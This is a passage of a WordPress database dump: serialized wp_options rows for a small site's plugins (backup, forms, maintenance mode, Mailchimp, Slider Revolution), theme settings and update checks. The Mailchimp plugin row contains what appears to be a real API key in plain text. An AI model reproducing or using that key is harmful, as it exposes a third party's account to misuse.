"library\";a:0:{}s:15:\"plugins_checked\";a:2:{s:35:\"boldgrid-backup/boldgrid-backup.php\";a:1:{s:6:\"1.13.3\";i:1603887787;}s:51:\"boldgrid-backup-premium/boldgrid-backup-premium.php\";a:1:{s:5:\"1.3.3\";i:1603887787;}}}','yes'),(130,'boldgrid_backup_id','adfddc58','no'),(237,'action_scheduler_hybrid_store_demarkation','5','yes'),(170,'_site_transient_boldgrid_plugins_filtered','a:2:{s:35:\"boldgrid-backup/boldgrid-backup.php\";a:13:{s:4:\"Name\";s:12:\"Total Upkeep\";s:9:\"PluginURI\";s:41:\"https://www.boldgrid.com/boldgrid-backup/\";s:7:\"Version\";s:6:\"1.13.3\";s:11:\"Description\";s:159:\"Automated backups, remote backup to Amazon S3 and Google Drive, stop website crashes before they happen and more. Total Upkeep is the backup solution you need.\";s:6:\"Author\";s:8:\"BoldGrid\";s:9:\"AuthorURI\";s:25:\"https://www.boldgrid.com/\";s:10:\"TextDomain\";s:15:\"boldgrid-backup\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:12:\"Total Upkeep\";s:10:\"AuthorName\";s:8:\"BoldGrid\";}s:51:\"boldgrid-backup-premium/boldgrid-backup-premium.php\";a:13:{s:4:\"Name\";s:20:\"Total Upkeep Premium\";s:9:\"PluginURI\";s:41:\"https://www.boldgrid.com/boldgrid-backup/\";s:7:\"Version\";s:5:\"1.3.3\";s:11:\"Description\";s:46:\"Premium extension for the Total Upkeep plugin.\";s:6:\"Author\";s:8:\"BoldGrid\";s:9:\"AuthorURI\";s:25:\"https://www.boldgrid.com/\";s:10:\"TextDomain\";s:15:\"boldgrid-backup\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:20:\"Total Upkeep Premium\";s:10:\"AuthorName\";s:8:\"BoldGrid\";}}','no'),(138,'do_activate','0','yes'),(168,'finished_updating_comment_type','1','yes'),(238,'schema-ActionScheduler_StoreSchema','3.0.1603888097','yes'),(239,'schema-ActionScheduler_LoggerSchema','2.0.1603888097','yes'),(240,'wpforms_version','1.6.3.1','yes'),(241,'wpforms_version_lite','1.6.3.1','yes'),(242,'wpforms_activated','a:1:{s:4:\"lite\";i:1603888097;}','yes'),(250,'wpforms_review','a:2:{s:4:\"time\";i:1607030343;s:9:\"dismissed\";b:1;}','yes'),(251,'ucp_notices','a:1:{s:19:\"dismiss_whitelisted\";b:1;}','yes'),(245,'action_scheduler_lock_async-request-runner','1618722094','yes'),(246,'widget_wpforms-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(172,'ucp_pointers','a:0:{}','yes'),(226,'ucp_options','a:34:{s:6:\"status\";s:1:\"1\";s:11:\"license_key\";s:0:\"\";s:14:\"license_active\";b:0;s:15:\"license_expires\";s:10:\"1900-01-01\";s:12:\"license_type\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:14:\"ga_tracking_id\";s:0:\"\";s:5:\"theme\";s:12:\"mad_designer\";s:10:\"custom_css\";s:0:\"\";s:5:\"title\";s:34:\"[site-title] is under construction\";s:11:\"description\";s:14:\"[site-tagline]\";s:8:\"heading1\";s:40:\"Sorry, we\'re doing some work on the site\";s:7:\"content\";s:89:\"Thank you for being patient. We are doing some work on the site and will be back shortly.\";s:15:\"social_facebook\";s:0:\"\";s:14:\"social_twitter\";s:0:\"\";s:13:\"social_google\";s:0:\"\";s:15:\"social_linkedin\";s:0:\"\";s:14:\"social_youtube\";s:0:\"\";s:12:\"social_vimeo\";s:0:\"\";s:16:\"social_pinterest\";s:0:\"\";s:15:\"social_dribbble\";s:0:\"\";s:14:\"social_behance\";s:0:\"\";s:16:\"social_instagram\";s:0:\"\";s:13:\"social_tumblr\";s:0:\"\";s:9:\"social_vk\";s:0:\"\";s:12:\"social_email\";s:0:\"\";s:12:\"social_phone\";s:0:\"\";s:12:\"social_skype\";s:0:\"\";s:15:\"social_telegram\";s:0:\"\";s:15:\"social_whatsapp\";s:0:\"\";s:12:\"login_button\";s:1:\"1\";s:8:\"linkback\";i:0;s:17:\"whitelisted_roles\";a:1:{i:0;s:13:\"administrator\";}s:17:\"whitelisted_users\";a:0:{}}','yes'),(7695,'mc4wp','a:6:{s:19:\"grecaptcha_site_key\";s:0:\"\";s:21:\"grecaptcha_secret_key\";s:0:\"\";s:7:\"api_key\";s:37:\"e8e93ddc6a33be660713d80e6427d9e7-us19\";s:20:\"allow_usage_tracking\";i:0;s:15:\"debug_log_level\";s:7:\"warning\";s:18:\"first_activated_on\";i:1607030391;}','yes'),(173,'recently_activated','a:0:{}','yes'),(174,'ucp_meta','a:3:{s:13:\"first_version\";s:4:\"3.83\";s:13:\"first_install\";i:1603887868;s:11:\"options_ver\";s:4:\"3.87\";}','yes'),(15184,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:2:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.7.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.7.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.7.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.7.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"5.7.1\";s:7:\"version\";s:5:\"5.7.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.6\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.7.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.7.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.7.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.7.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"5.7.1\";s:7:\"version\";s:5:\"5.7.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.6\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1618748670;s:15:\"version_checked\";s:5:\"5.6.3\";s:12:\"translations\";a:0:{}}','no'),(324,'jqmh_last_log_time','1603893895','yes'),(325,'_jquery_migrate_dismissed_notice','1603893012','yes'),(330,'wpb_js_composer_license_activation_notified','yes','yes'),(332,'jqmh_logs','a:1:{s:32:\"4e80a918beface98f9057e2a667f9f22\";a:4:{s:10:\"registered\";s:19:\"2020-10-28 13:51:25\";s:4:\"page\";s:33:\"http://highperformingstudent.com/\";s:7:\"backend\";b:0;s:6:\"notice\";s:111:\"http://highperformingstudent.com/wp-content/themes/north/js/jquery.mb.YTPlayer.js: jQuery.browser is deprecated\";}}','yes'),(347,'wpcf7','a:2:{s:7:\"version\";s:5:\"5.3.2\";s:13:\"bulk_validate\";a:4:{s:9:\"timestamp\";i:1603893534;s:7:\"version\";s:3:\"5.3\";s:11:\"count_valid\";i:1;s:13:\"count_invalid\";i:0;}}','yes'),(345,'category_children','a:6:{i:5;a:1:{i:0;i:51;}i:39;a:1:{i:0;i:64;}i:64;a:1:{i:0;i:65;}i:40;a:5:{i:0;i:66;i:1;i:67;i:2;i:68;i:3;i:69;i:4;i:70;}i:28;a:1:{i:0;i:71;}i:68;a:1:{i:0;i:72;}}','yes'),(279,'current_theme','North','yes'),(369,'revslider_update_version','6.2.0','yes'),(257,'wpforms_notifications','a:4:{s:6:\"update\";i:1612964641;s:4:\"feed\";a:3:{i:0;a:6:{s:5:\"title\";s:47:\"Get Deeper Insights with the User Journey Addon\";s:7:\"content\";s:258:\"Discover the steps your visitors take before they submit your forms, without all the complicated analytics. With our new User Journey addon you can easily see the content that’s driving the most valuable form conversions, right in your WordPress dashboard.\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:2:\"id\";i:41;s:4:\"btns\";a:2:{s:4:\"main\";a:2:{s:3:\"url\";s:166:\"https://wpforms.com/introducing-user-journey-addon-wpforms/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=UJ Lite Learn More\";s:4:\"text\";s:10:\"Learn More\";}s:3:\"alt\";a:2:{s:3:\"url\";s:153:\"https://wpforms.com/wpforms-lite-upgrade/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=UJ Lite Get WPForms Pro\";s:4:\"text\";s:15:\"Get WPForms Pro\";}}s:5:\"start\";s:19:\"2020-11-12 11:21:36\";}i:1;a:6:{s:5:\"title\";s:77:\"New in WPForms! A Divi Module, Email Address Restrictions + Date/Time Limits.\";s:7:\"content\";s:339:\"Controlling forms has never been easier. WPForms now lets you easily add forms right inside the Divi page builder, so you can ditch the shortcodes. Not only that, but you can now block or allow specific email addresses, and there’s a new datepicker field in town that lets you set date and time limits. Plus, an easy-to-find Help Menu.\r\n\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:2:\"id\";i:37;s:4:\"btns\";a:2:{s:4:\"main\";a:2:{s:3:\"url\";s:225:\"https://wpforms.com/introducing-wpforms-1-6-3-divi-module-email-address-restrictions-date-time-limits-more/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=WPForms 1.6.3 Lite Learn More\";s:4:\"text\";s:10:\"Learn More\";}s:3:\"alt\";a:2:{s:3:\"url\";s:164:\"https://wpforms.com/wpforms-lite-upgrade/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=WPForms 1.6.3 Lite Get WPForms Pro\";s:4:\"text\";s:15:\"Get WPForms Pro\";}}s:5:\"start\";s:19:\"2020-11-12 11:21:36\";}i:2;a:6:{s:5:\"title\";s:69:\"Introducing WPForms Webhooks - Powerful Flexibility With Integrations\";s:7:\"content\";s:286:\"With the new WPForms Webhooks addon, you can automatically send data from forms to other tools and apps, without a 3rd-party connector. This power-user feature will help save time and money as you automate your forms. Upgrade to an Elite license now to start using this awesome feature.\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:2:\"id\";i:30;s:4:\"btns\";a:2:{s:4:\"main\";a:2:{s:3:\"url\";s:161:\"https://wpforms.com/wpforms-lite-upgrade/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=Webhooks Lite Get WPForms Elite\";s:4:\"text\";s:17:\"Get WPForms Elite\";}s:3:\"alt\";a:2:{s:3:\"url\";s:176:\"https://wpforms.com/introducing-the-webhooks-addon-for-wpforms/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=Webhooks Lite Learn More\";s:4:\"text\";s:10:\"Learn More\";}}s:5:\"start\";s:19:\"2020-11-12 11:21:36\";}}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:0:{}}','yes'),(280,'theme_mods_north','a:87:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:7:\"backups\";N;s:9:\"smof_init\";s:31:\"Wed, 28 Oct 2020 13:23:57 +0000\";s:13:\"vntd_logo_url\";s:83:\"http://highperformingstudent.com/wp-content/uploads/2021/02/SamDemma-Logo-FINAL.png\";s:11:\"vntd_loader\";s:1:\"0\";s:15:\"vntd_responsive\";i:1;s:8:\"vntd_stt\";s:1:\"0\";s:19:\"vntd_default_layout\";s:9:\"fullwidth\";s:15:\"vntd_vc_default\";i:0;s:17:\"vntd_scroll_speed\";s:3:\"900\";s:17:\"vntd_navbar_style\";s:6:\"style1\";s:17:\"vntd_navbar_color\";s:5:\"white\";s:18:\"vntd_sticky_header\";i:1;s:25:\"vntd_sticky_header_mobile\";i:1;s:17:\"vntd_header_title\";s:1:\"0\";s:16:\"vntd_breadcrumbs\";i:1;s:19:\"vntd_logo_light_url\";s:83:\"http://highperformingstudent.com/wp-content/uploads/2021/02/SamDemma-Logo-FINAL.png\";s:14:\"vntd_copyright\";s:81:\"Copyright {year} <a href=\"#\">highperformingstudent.com</a> - All rights reserved.\";s:19:\"vntd_footer_widgets\";s:8:\"disabled\";s:16:\"vntd_footer_skin\";s:5:\"white\";s:17:\"vntd_footer_style\";s:8:\"centered\";s:19:\"vntd_footer_img_url\";s:83:\"http://highperformingstudent.com/wp-content/uploads/2021/02/SamDemma-Logo-FINAL.png\";s:24:\"vntd_footer_img_dark_url\";s:83:\"http://highperformingstudent.com/wp-content/uploads/2021/02/SamDemma-Logo-FINAL.png\";s:17:\"vntd_social_icons\";a:1:{i:1;a:3:{s:5:\"order\";s:1:\"1\";s:9:\"icon_name\";s:8:\"facebook\";s:3:\"url\";s:0:\"\";}}s:24:\"vntd_social_icons_target\";i:0;s:14:\"vntd_blog_meta\";i:1;s:21:\"vntd_blog_single_meta\";i:1;s:21:\"vntd_blog_meta_author\";i:1;s:19:\"vntd_blog_meta_date\";i:1;s:25:\"vntd_blog_meta_categories\";i:1;s:23:\"vntd_blog_meta_comments\";i:1;s:18:\"vntd_portfolio_url\";s:0:\"\";s:17:\"sidebar_generator\";a:1:{i:1;a:2:{s:5:\"order\";s:1:\"1\";s:5:\"title\";s:13:\"New Sidebar 1\";}}s:17:\"vntd_accent_color\";s:7:\"#e612a9\";s:13:\"vntd_bg_color\";s:7:\"#ffffff\";s:9:\"vntd_skin\";s:5:\"white\";s:17:\"vntd_skin_overlay\";s:4:\"dark\";s:21:\"vntd_header_nav_color\";s:7:\"#66757f\";s:28:\"vntd_header_transp_nav_color\";s:0:\"\";s:26:\"vntd_header_hover_bg_color\";s:7:\"#ffffff\";s:20:\"vntd_header_bg_color\";s:7:\"#ffffff\";s:20:\"vntd_pagetitle_color\";s:7:\"#333333\";s:28:\"vntd_pagetitle_tagline_color\";s:7:\"#787777\";s:22:\"vntd_breadcrumbs_color\";s:7:\"#6a6a6a\";s:23:\"vntd_pagetitle_bg_color\";s:7:\"#fafafa\";s:27:\"vntd_pagetitle_border_color\";s:7:\"#fafafa\";s:15:\"vntd_body_color\";s:7:\"#333333\";s:18:\"vntd_heading_color\";s:7:\"#333333\";s:24:\"vntd_content_hover_color\";s:7:\"#a300df\";s:26:\"vntd_content_divider_color\";s:7:\"#333333\";s:17:\"vntd_footer_color\";s:7:\"#ffffff\";s:24:\"vntd_footer_border_color\";s:7:\"#ffffff\";s:20:\"vntd_footer_bg_color\";s:7:\"#444444\";s:24:\"vntd_footer_widgets_skin\";s:7:\"default\";s:28:\"vntd_footer_widgets_bg_color\";s:0:\"\";s:30:\"vntd_footer_widgets_text_color\";s:0:\"\";s:33:\"vntd_footer_widgets_heading_color\";s:0:\"\";s:30:\"vntd_footer_widgets_link_color\";s:0:\"\";s:33:\"vntd_footer_widgets_borders_color\";s:0:\"\";s:39:\"vntd_footer_widgets_link_hover_bg_color\";s:0:\"\";s:17:\"vntd_heading_font\";s:6:\"Roboto\";s:14:\"vntd_body_font\";s:9:\"Open Sans\";s:24:\"vntd_heading_font_weight\";s:3:\"400\";s:27:\"vntd_heading_font_transform\";s:4:\"none\";s:27:\"vntd_navigation_font_weight\";s:3:\"600\";s:30:\"vntd_navigation_font_transform\";s:4:\"none\";s:12:\"vntd_fs_body\";s:2:\"15\";s:18:\"vntd_fs_navigation\";s:2:\"15\";s:18:\"vntd_fs_page_title\";s:2:\"30\";s:20:\"vntd_fs_page_tagline\";s:2:\"14\";s:19:\"vntd_fs_breadcrumbs\";s:2:\"13\";s:15:\"vntd_fs_special\";s:2:\"60\";s:10:\"vntd_fs_h1\";s:2:\"36\";s:10:\"vntd_fs_h2\";s:2:\"30\";s:10:\"vntd_fs_h3\";s:2:\"24\";s:10:\"vntd_fs_h4\";s:2:\"18\";s:10:\"vntd_fs_h5\";s:2:\"14\";s:10:\"vntd_fs_h6\";s:2:\"12\";s:17:\"vntd_fs_copyright\";s:2:\"11\";s:20:\"vntd_archives_layout\";s:13:\"sidebar_right\";s:17:\"vntd_search_style\";s:7:\"default\";s:18:\"vntd_search_layout\";s:13:\"sidebar_right\";s:16:\"vntd_404_content\";s:0:\"\";s:15:\"vntd_custom_css\";s:0:\"\";s:19:\"vntd_google_map_api\";s:0:\"\";s:18:\"custom_css_post_id\";i:39;}','yes'),(281,'theme_switched','','yes'),(329,'vc_version','6.4.1','yes'),(15180,'_site_transient_timeout_php_check_8c0181da100b1c7d1f637c18117d0149','1619094519','no'),(15181,'_site_transient_php_check_8c0181da100b1c7d1f637c18117d0149','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(348,'revslider_servers','a:7:{i:0;s:22:\"themepunch-ext-b.tools\";i:1;s:22:\"themepunch-ext-b.tools\";i:2;s:16:\"themepunch.tools\";i:3;s:22:\"themepunch-ext-a.tools\";i:4;s:22:\"themepunch-ext-a.tools\";i:5;s:22:\"themepunch-ext-a.tools\";i:6;s:22:\"themepunch-ext-b.tools\";}','yes'),(349,'revslider_server_refresh','1618161131','yes'),(350,'revslider-update-check-short','1618722031','yes'),(351,'revslider-connection','1','yes'),(352,'revslider-update-hash','7e3526e73b8da2458e79d4f057563f6d','yes'),(353,'revslider-latest-version','6.4.8','yes'),(354,'revslider-stable-version','4.2.0','yes'),(355,'revslider-notices','a:1:{i:0;O:8:\"stdClass\":8:{s:7:\"version\";s:5:\"9.9.9\";s:4:\"text\";s:324:\"<div style=\"display: block; background-color: #1C0950; text-align: \ncenter;\"><a \nhref=\"https://www.sliderrevolution.com/survey/slider-revolution-feature-survey/\"\n target=\"_blank\"><img alt=\"wow\" src=\"//updates.themepunch-ext-b.tools/banners/SR_backend_wow.jpg\" width=\"960\" height=\"250\" style=\"margin-bottom: -5px;\"></a></div>\";s:4:\"code\";s:11:\"TPRSV647-01\";s:5:\"color\";s:5:\"green\";s:7:\"disable\";b:0;s:9:\"is_global\";b:0;s:4:\"type\";s:1:\"3\";s:10:\"additional\";a:0:{}}}','yes'),(356,'revslider-additions','O:8:\"stdClass\":1:{s:7:\"selling\";b:1;}','yes'),(357,'rs-addons-counter','2','yes'),(358,'revslider-addons','O:8:\"stdClass\":29:{s:22:\"revslider-backup-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:22:\"revslider-backup-addon\";s:12:\"version_from\";s:5:\"5.2.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Backup\";s:6:\"line_1\";s:12:\"Make Backups\";s:6:\"line_2\";s:25:\"Revisions for your safety\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_backup.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BU\";}}s:23:\"revslider-gallery-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:23:\"revslider-gallery-addon\";s:12:\"version_from\";s:5:\"5.2.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:17:\"WordPress Gallery\";s:6:\"line_1\";s:31:\"Replace the standard WP Gallery\";s:6:\"line_2\";s:31:\"with the Sliders of your choice\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_wpgallery.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"GA\";}}s:25:\"revslider-rel-posts-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:25:\"revslider-rel-posts-addon\";s:12:\"version_from\";s:7:\"5.2.4.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:13:\"Related Posts\";s:6:\"line_1\";s:25:\"Add related Posts Sliders\";s:6:\"line_2\";s:31:\"at the end of your post content\";s:9:\"available\";s:5:\"2.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_wprelated.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RP\";}}s:26:\"revslider-typewriter-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:26:\"revslider-typewriter-addon\";s:12:\"version_from\";s:5:\"5.3.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:17:\"Typewriter Effect\";s:6:\"line_1\";s:27:\"Enhance your slider\'s text \";s:6:\"line_2\";s:24:\"with typewriter effects \";s:9:\"available\";s:5:\"2.0.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_typewriter.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"TW\";}}s:23:\"revslider-sharing-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:23:\"revslider-sharing-addon\";s:12:\"version_from\";s:5:\"5.3.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Social Sharing\";s:6:\"line_1\";s:17:\"Share your slides\";s:6:\"line_2\";s:50:\"with RevSlider \"actions\" because sharing is caring\";s:9:\"available\";s:5:\"2.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:80:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_socialsharing.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SH\";}}s:27:\"revslider-maintenance-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:27:\"revslider-maintenance-addon\";s:12:\"version_from\";s:5:\"5.3.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:15:\"Coming & Maint.\";s:6:\"line_1\";s:37:\"Simple Coming Soon & Maintenance Page\";s:6:\"line_2\";s:42:\"Let your visitors know what\'s up and when!\";s:9:\"available\";s:5:\"2.1.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:84:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_underconstruction.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"MT\";}}s:20:\"revslider-snow-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:20:\"revslider-snow-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:12:\"Holiday Snow\";s:6:\"line_1\";s:12:\"Let it snow!\";s:6:\"line_2\";s:32:\"Add animated snow to any Slider \";s:9:\"available\";s:5:\"2.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:71:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_snow.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SN\";}}s:24:\"revslider-polyfold-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:24:\"revslider-polyfold-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:22:\"Polyfold Scroll Effect\";s:6:\"line_1\";s:32:\"Add sharp edges to your sliders \";s:6:\"line_2\";s:35:\"as they scroll into and out of view\";s:9:\"available\";s:5:\"2.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:75:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_polyfold.jpg\";s:5:\"color\";s:7:\"#3e186f\";s:4:\"text\";s:2:\"PF\";}}s:19:\"revslider-404-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:19:\"revslider-404-addon\";s:12:\"version_from\";s:3:\"5.3\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:3:\"404\";s:6:\"line_1\";s:39:\"Build custom 404 \"Page not Found\" Pages\";s:6:\"line_2\";s:28:\"with Slider Revolution swag!\";s:9:\"available\";s:5:\"2.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:70:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_404.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:3:\"404\";}}s:30:\"revslider-prevnext-posts-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:30:\"revslider-prevnext-posts-addon\";s:12:\"version_from\";s:3:\"5.4\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Adjacent Posts\";s:6:\"line_1\";s:30:\"Display previous and next post\";s:6:\"line_2\";s:28:\"to the currently showing one\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_wpadjacent.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PN\";}}s:25:\"revslider-filmstrip-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:25:\"revslider-filmstrip-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:9:\"Filmstrip\";s:6:\"line_1\";s:44:\"Display a continously rotating set of images\";s:6:\"line_2\";s:26:\"for your slide backgrounds\";s:9:\"available\";s:5:\"2.0.4\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_filmstrip.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"FS\";}}s:21:\"revslider-login-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:21:\"revslider-login-addon\";s:12:\"version_from\";s:3:\"5.4\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Login Page\";s:6:\"line_1\";s:25:\"Very simple WP Login Page\";s:6:\"line_2\";s:34:\"enhanced with your favorite slider\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:72:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_login.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LI\";}}s:24:\"revslider-featured-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:24:\"revslider-featured-addon\";s:12:\"version_from\";s:3:\"5.4\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:20:\"Post Featured Slider\";s:6:\"line_1\";s:25:\"Display a featured Slider\";s:6:\"line_2\";s:41:\"instead of a featured Image in your Posts\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_wpfeatured.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"FT\";}}s:23:\"revslider-weather-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:23:\"revslider-weather-addon\";s:12:\"version_from\";s:7:\"5.4.5.2\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:7:\"Weather\";s:6:\"line_1\";s:21:\"Every where you go...\";s:6:\"line_2\";s:36:\"...always take the weather with 